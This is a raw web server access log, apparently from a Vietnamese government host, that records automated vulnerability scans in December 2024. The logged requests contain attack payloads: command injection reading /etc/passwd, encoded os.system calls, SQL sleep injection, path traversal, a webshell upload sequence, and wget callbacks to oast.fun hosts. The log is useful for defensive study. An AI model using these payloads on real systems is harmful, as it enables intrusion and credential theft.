156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.65 bcvt.kontum.gov.vn:8172 404 7 0 203 2024-12-12 06:46:22 103.153.214.94 POST /cgi-bin/file_transfer.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 230 2024-12-12 06:49:16 103.153.214.94 POST /pandora_console/index.php login=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.1+Safari/605.1.15 - 404 7 0 206 2024-12-12 06:49:19 103.153.214.94 POST /pandora_console/index.php sec=netf&sec2=operation/netflow/nf_live_view&pure=0 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 06:49:21 103.153.214.94 PUT /wp-content/plugins/w3-total-cache/pub/sns.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 204 2024-12-12 06:49:22 103.153.214.94 POST /node/1 _format=hal_json 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 214 2024-12-12 06:50:07 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.9.17 - 404 7 0 229 2024-12-12 06:50:10 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/Slots 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 208 2024-12-12 06:53:21 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.20 - 404 7 0 245 2024-12-12 06:53:24 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.46 - 404 7 0 216 2024-12-12 06:53:43 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 210 2024-12-12 06:54:30 103.153.214.94 POST /service/extdirect - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:97.0)+Gecko/20100101+Firefox/97.0 - 404 7 0 224 2024-12-12 06:55:34 103.153.214.94 GET /account/register - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.65 - 404 7 0 60 2024-12-12 06:55:54 103.153.214.94 POST /adxmlrpc.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 06:55:57 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 06:57:20 103.153.214.94 GET /favicon.ico - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 06:57:34 103.153.214.94 GET /api/v1/namespaces/default/workflows query 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 38 2024-12-12 06:58:08 103.153.214.94 POST /photo/p/api/album.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 220 2024-12-12 06:58:52 103.153.214.94 POST /cgi-bin/supportInstaller - 8172 - 156.251.25.152 MSIE - 404 7 0 216 2024-12-12 06:59:28 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_5_7;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.7+Safari/605.1.15 - 404 7 0 39 2024-12-12 07:00:00 103.153.214.94 POST /api/timelion/run - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 07:01:21 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 217 2024-12-12 07:01:24 103.153.214.94 POST /_async/AsyncResponseService - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 269 2024-12-12 07:01:29 103.153.214.94 GET /_async/favicon.ico - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 217 2024-12-12 07:01:41 103.153.214.94 GET /latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance - 8172 - 206.238.196.225 - - 404 7 0 75 2024-12-12 07:01:52 103.153.214.94 POST /CDGServer3/ClientAjax - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 07:02:34 103.153.214.94 POST /Autodiscover/Autodiscover.xml - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 07:02:35 103.153.214.94 GET /card_scan.php No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20qMfHRzqAzD.txt%60 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 07:02:38 103.153.214.94 GET /qMfHRzqAzD.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.124+Safari/537.36 - 404 7 0 199 2024-12-12 07:03:03 103.153.214.94 POST /artifactory/ui/auth/login _spring_security_remember_me=false 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/artifactory/webapp/ 404 7 0 207 2024-12-12 07:03:26 103.153.214.94 GET /backupsettings.dat - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 207 2024-12-12 07:03:37 103.153.214.94 POST /mdm/client/v1/mdmLogUploader udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 207 2024-12-12 07:05:11 103.153.214.94 GET /wp-content/plugins/chopslider/get_script/index.php id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.45 - 404 7 0 207 2024-12-12 07:05:54 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 07:06:01 103.153.214.94 POST /.antproxy.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_2_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 56 2024-12-12 07:06:40 103.153.214.94 GET /objects/getImage.php base64Url=YGlkID4gcHZ4dm8udHh0YA===&format=png 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 202 2024-12-12 07:06:45 103.153.214.94 GET /objects/getImageMP4.php base64Url=YGlkID4gcHZ4dm8udHh0YA===&format=jpg 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.14 - 404 7 0 206 2024-12-12 07:06:47 103.153.214.94 POST /content/2q6JQgZmdce6V4W95e4KN5m1SPn - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.19 https://bcvt.kontum.gov.vn:8172 404 7 0 202 2024-12-12 07:06:47 103.153.214.94 GET /objects/getSpiritsFromVideo.php base64Url=YGlkID4gcHZ4dm8udHh0YA===&format=jpg 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 07:06:51 103.153.214.94 POST /content/2q6JQgZmdce6V4W95e4KN5m1SPn.af.internalsubmit.json - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 https://bcvt.kontum.gov.vn:8172 404 7 0 227 2024-12-12 07:06:51 103.153.214.94 GET /objects/pvxvo.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 228 2024-12-12 07:06:53 103.153.214.94 POST /search/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Mobile/15E148+Safari/604.1 - 404 7 0 223 2024-12-12 07:06:57 103.153.214.94 POST /search/ - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 195 2024-12-12 07:07:09 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 16 2024-12-12 07:07:09 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 33 2024-12-12 07:07:09 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 19 2024-12-12 07:07:09 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=63953744-9f05-4fe9-aa70-456d902fc6fa;op=Sync - 200 0 0 484 2024-12-12 07:07:09 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 564 2024-12-12 07:07:09 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 24 2024-12-12 07:07:28 103.153.214.94 POST /mailingupgrade.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.22 - 404 7 0 206 2024-12-12 07:08:02 103.153.214.94 POST /fpui/loginServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 - 404 7 0 37 2024-12-12 07:08:10 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 60567 2024-12-12 07:08:10 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=63953744-9f05-4fe9-aa70-456d902fc6fa;op=Sync - 200 0 0 60520 2024-12-12 07:08:53 103.153.214.94 GET /WKdNCx - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 42 2024-12-12 07:09:06 103.153.214.94 GET /heapdump - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 42 2024-12-12 07:09:19 103.153.214.94 GET /actuator/heapdump - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 404 7 0 33 2024-12-12 07:09:30 103.153.214.94 POST /v2/api/product/manger/getInfo - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.2.20 - 404 7 0 204 2024-12-12 07:09:58 103.153.214.94 POST /ajax/api/content_infraction/getIndexableContent - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 07:10:07 103.153.214.94 POST /solr/gettingstarted_shard1_replica_n1/config - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 40 2024-12-12 07:10:20 103.153.214.94 POST /solr/gettingstarted_shard2_replica_n1/debug/dump param=ContentStreams 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Teak/4.3.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 33 2024-12-12 07:11:29 103.153.214.94 POST /service/rapture/session - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 07:11:32 103.153.214.94 POST /service/rest/beta/repositories/bower/group - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 224 2024-12-12 07:12:55 103.153.214.94 GET /jexws/jexws.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 40 2024-12-12 07:12:55 103.153.214.94 GET /jbossass/jbossass.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 34 2024-12-12 07:12:55 103.153.214.94 GET /jexws4/jexws4.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 - 404 7 0 32 2024-12-12 07:12:55 103.153.214.94 GET /jexws4/jexws4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 30 2024-12-12 07:12:56 103.153.214.94 GET /jbossass/jbossass.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 47 2024-12-12 07:12:56 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 58 2024-12-12 07:12:56 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 55 2024-12-12 07:12:56 103.153.214.94 GET /jexws/jexws.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 07:13:17 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 210 2024-12-12 07:13:31 103.153.214.94 POST /http/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 48 2024-12-12 07:15:22 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 07:15:54 103.153.214.94 POST /module/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/617.16.12+(KHTML,+like+Gecko)+Version/17.7.92+Safari/617.16.12 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 198 2024-12-12 07:15:54 103.153.214.94 POST /module/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 199 2024-12-12 07:15:54 103.153.214.94 POST /module/ - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 206 2024-12-12 07:16:51 103.153.214.94 POST /pandora_console/ajax.php page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 226 2024-12-12 07:17:22 103.153.214.94 POST /context.json - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.9.17 - 404 7 0 207 2024-12-12 07:17:57 103.153.214.94 POST /console/css/%2e%2e%2fconsole.portal - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 400 0 0 233 2024-12-12 07:18:32 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.21 - 404 7 0 209 2024-12-12 07:18:36 103.153.214.94 GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2q6JQR8NIqi7Fs88zumefL82MhW.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 07:18:50 103.153.214.94 POST /mifs/.;/services/LogService - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 229 2024-12-12 07:18:59 103.153.214.94 POST /console/images/%2e%2e%2fconsole.portal - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.3+Safari/605.1.15 - 400 0 0 210 2024-12-12 07:19:47 103.153.214.94 POST /php/upload.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.54+Safari/537.36 - 404 7 0 44 2024-12-12 07:19:52 103.153.214.94 POST /dashboard/proc.php type=login 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.8.25 - 404 7 0 58 2024-12-12 07:19:59 103.153.214.94 POST /php/renamefile.php f=%2Fapp%2FUploads%2F2q3kZAdItmqjB8gEyGkraVoQlEF.jpg&n=2q3kZAdItmqjB8gEyGkraVoQlEF.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 60 2024-12-12 07:20:10 103.153.214.94 POST /php/movefile.php f=%2Fapp%2FUploads%2F2q3kZAdItmqjB8gEyGkraVoQlEF.jpg&n=%2Fapp%2FUploads%2F2q3kZAdItmqjB8gEyGkraVoQlEF.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 58 2024-12-12 07:20:22 103.153.214.94 GET /Uploads/2q3kZAdItmqjB8gEyGkraVoQlEF.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.4+Safari/605.1.15 - 404 7 0 33 2024-12-12 07:21:55 103.153.214.94 PUT /PhoneBackup/2q3kZ5MF0PTxUxHQHPkT5IQ93af.php - 8172 - 206.238.196.225 AVAYA - 404 7 0 46 2024-12-12 07:22:07 103.153.214.94 GET /PhoneBackup/2q3kZ5MF0PTxUxHQHPkT5IQ93af.php - 8172 - 206.238.196.225 AVAYA - 404 7 0 41 2024-12-12 07:22:50 103.153.214.94 GET /webadmin/tools/unixlogin.php login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e4532536c466c63454a78654556465330527861336c3264305a556258647a5531553222207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 232 2024-12-12 07:22:54 103.153.214.94 GET /webadmin/out - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 219 2024-12-12 07:23:38 103.153.214.94 GET /user/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6+Safari/605.1.15 - 404 7 0 205 2024-12-12 07:24:02 103.153.214.94 POST /run - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 07:25:15 103.153.214.94 POST /index.php/bbs/index/download url=/etc/passwd&name=1.txt&local=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 47 2024-12-12 07:25:16 103.153.214.94 POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx method=GetStoreWarehouseByStore 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/616.19+(KHTML,+like+Gecko)+Version/17.7.17+Safari/616.19 - 404 7 0 70 2024-12-12 07:25:56 103.153.214.94 POST /commpilot/servlet/Login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:121.0)+Gecko/20100101+Firefox/121.0 https://bcvt.kontum.gov.vn:8172 404 7 0 67 2024-12-12 07:26:03 103.153.214.94 POST /suite-auth/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 46 2024-12-12 07:26:24 103.153.214.94 POST /fuel/login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.6+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172 404 7 0 204 2024-12-12 07:26:24 103.153.214.94 GET /fuel/pages/items/ search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 https://bcvt.kontum.gov.vn:8172 404 7 0 204 2024-12-12 07:26:24 103.153.214.94 GET /fuel/login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 07:26:41 103.153.214.94 GET /Collector/storagemgmt/apply data%5B0%5D%5Bhost%5D=%60/bin/wget+http://ctd67t3bclspkptm3qo03wpeb3z8kstsf.oast.fun%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype 8172 - 156.251.25.152 - - 404 7 0 205 2024-12-12 07:26:43 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://ctd67t3bclspkptm3qo0pntd717sqjxsu.oast.fun) 8172 - 156.251.25.152 - - 404 7 0 206 2024-12-12 07:28:23 103.153.214.94 POST /ccmadmin/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/ccmadmin/showHome.do 404 7 0 49 2024-12-12 07:28:39 103.153.214.94 GET /user/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 